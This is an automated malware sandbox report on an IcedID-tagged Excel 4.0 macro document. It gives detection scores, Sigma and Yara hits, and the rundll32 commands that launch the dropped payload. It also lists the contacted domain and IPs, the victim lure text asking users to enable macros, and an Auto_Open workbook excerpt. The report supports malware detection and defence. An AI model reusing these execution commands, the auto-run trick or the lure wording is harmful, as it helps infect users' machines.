Loading ...

Play interactive tourEdit tour

Analysis Report statistic-2067311372.xlsm

Overview

General Information

Sample Name:statistic-2067311372.xlsm
Analysis ID:403886
MD5:894169c41e45975fa36c36c031628f52
SHA1:3ad2f1b52fca973252dfba03610bf1def0c37e3c
SHA256:69a97d83771cb6cb1583fbf95e5fb9ada26f1ee6257351ecf24b9b4e9e4d80d4
Tags:IcedIDxlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: System File Execution Location Anomaly
Yara detected MalDoc1
Excel documents contains an embedded macro which executes code when the document is opened
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w10x64
  • EXCEL.EXE (PID: 3008 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • rundll32.exe (PID: 5904 cmdline: rundll32 ..\jordji.nbvt1,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6136 cmdline: rundll32 ..\jordji.nbvt11,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
sharedStrings.xmlJoeSecurity_MalDoc_1Yara detected MalDoc_1Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3008, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 5904
    Sigma detected: System File Execution Location AnomalyShow sources
    Source: Process startedAuthor: Florian Roth, Patrick Bareiss, Anton Kutepov, oscd.community: Data: Command: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 3008, ProcessCommandLine: rundll32 ..\jordji.nbvt1,DllRegisterServer, ProcessId: 5904

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: statistic-2067311372.xlsmMetadefender: Detection: 18%Perma Link
    Source: statistic-2067311372.xlsmReversingLabs: Detection: 55%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.7:49690 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.7:49692 version: TLS 1.2

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: \KnownDlls32\WININET.dll origin: URLDownloadToFileA
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe
    Source: global trafficDNS query: name: industrialarttextile.com
    Source: global trafficTCP traffic: 192.168.2.7:49690 -> 192.254.233.89:443
    Source: global trafficTCP traffic: 192.168.2.7:49690 -> 192.254.233.89:443

    Networking:

    barindex
    Yara detected MalDoc1Show sources
    Source: Yara matchFile source: sharedStrings.xml, type: SAMPLE
    Source: Joe Sandbox ViewIP Address: 192.185.5.2 192.185.5.2
    Source: Joe Sandbox ViewIP Address: 192.254.233.89 192.254.233.89
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: unknownDNS traffic detected: queries for: industrialarttextile.com
    Source: jordji.nbvt11.0.drString found in binary or memory: http://fwdssp.com/?dn=referer_detect&pid=5POL4F2O4
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
    Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
    Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
    Source: unknownHTTPS traffic detected: 192.254.233.89:443 -> 192.168.2.7:49690 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 192.185.5.2:443 -> 192.168.2.7:49692 version: TLS 1.2

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Editing , please L_ , from the yellow bar above 'fled module could not befound. , OK WH
    Source: Screenshot number: 8Screenshot OCR: Enable Editing 'I from the yellow bar above ""i'? Once You have Enable Editing , please click En
    Source: Screenshot number: 8Screenshot OCR: Enable Content from the yellow bar above , , WHY I CANNOT OPEN THIS DOCUMENT? W You are using iO
    Source: Screenshot number: 12Screenshot OCR: Enable Editing i from the yellow bar above Once You have Enable Editing , please click Enable Co
    Source: Screenshot number: 12Screenshot OCR: Enable Content from the yellow bar above 0 ) WHY I CANNOT OPEN THIS DOCUMENT? I i I W You are
    Source: Document image extraction number: 7Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing , please click Enable Conten
    Source: Document image extraction number: 7Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
    Source: Document image extraction number: 17Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
    Source: Document image extraction number: 17Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? W You are using IDS or And
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: statistic-2067311372.xlsmInitial sample: EXEC
    Source: statistic-2067311372.xlsmInitial sample: CALL
    Found abnormal large hidden Excel 4.0 Macro sheetShow sources
    Source: statistic-2067311372.xlsmInitial sample: Sheet size: 22188
    Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><fileVersion appName="xl" lastEdited="5" lowestEdited="6" rupBuild="9303"/><workbookPr filterPrivacy="1"/><bookViews><workbookView xWindow="8595" yWindow="0" windowWidth="4020" windowHeight="3120"/></bookViews><sheets><sheet name="Sheet1" sheetId="9" r:id="rId1"/><sheet name="Sheet2" sheetId="4" r:id="rId2"/><sheet name="Sheet3" sheetId="7" r:id="rId3"/><sheet name="Sheet4" sheetId="8" r:id="rId4"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet2!$AO$115</definedName></definedNames><calcPr calcId="145621"/><extLst><ext uri="{140A7094-0E35-4892-8432-C4D2E57EDEB5}" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"><x15:workbookPr chartTrackingRefBase="1"/></ext></extLst></workbook>
    Source: classification engineClassification label: mal84.troj.expl.evad.winXLSM@5/13@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$statistic-2067311372.xlsmJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{F77D444E-DCC8-4E66-961F-B5220E6B994E} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: statistic-2067311372.xlsmMetadefender: Detection: 18%
    Source: statistic-2067311372.xlsmReversingLabs: Detection: 55%
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt1,DllRegisterServer
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\jordji.nbvt11,DllRegisterServer
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\rundll32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/media/image4.png
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/media/image2.png
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/media/image3.png
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: statistic-2067311372.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: rundll32.exe, 00000003.00000002.276994563.00000000045E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.270809498.0000000004C30000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
    Source: rundll32.exe, 00000003.00000002.276994563.00000000045E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.270809498.0000000004C30000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
    Source: rundll32.exe, 00000003.00000002.276994563.00000000045E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.270809498.0000000004C30000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
    Source: rundll32.exe, 00000003.00000002.276994563.00000000045E0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.270809498.0000000004C30000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
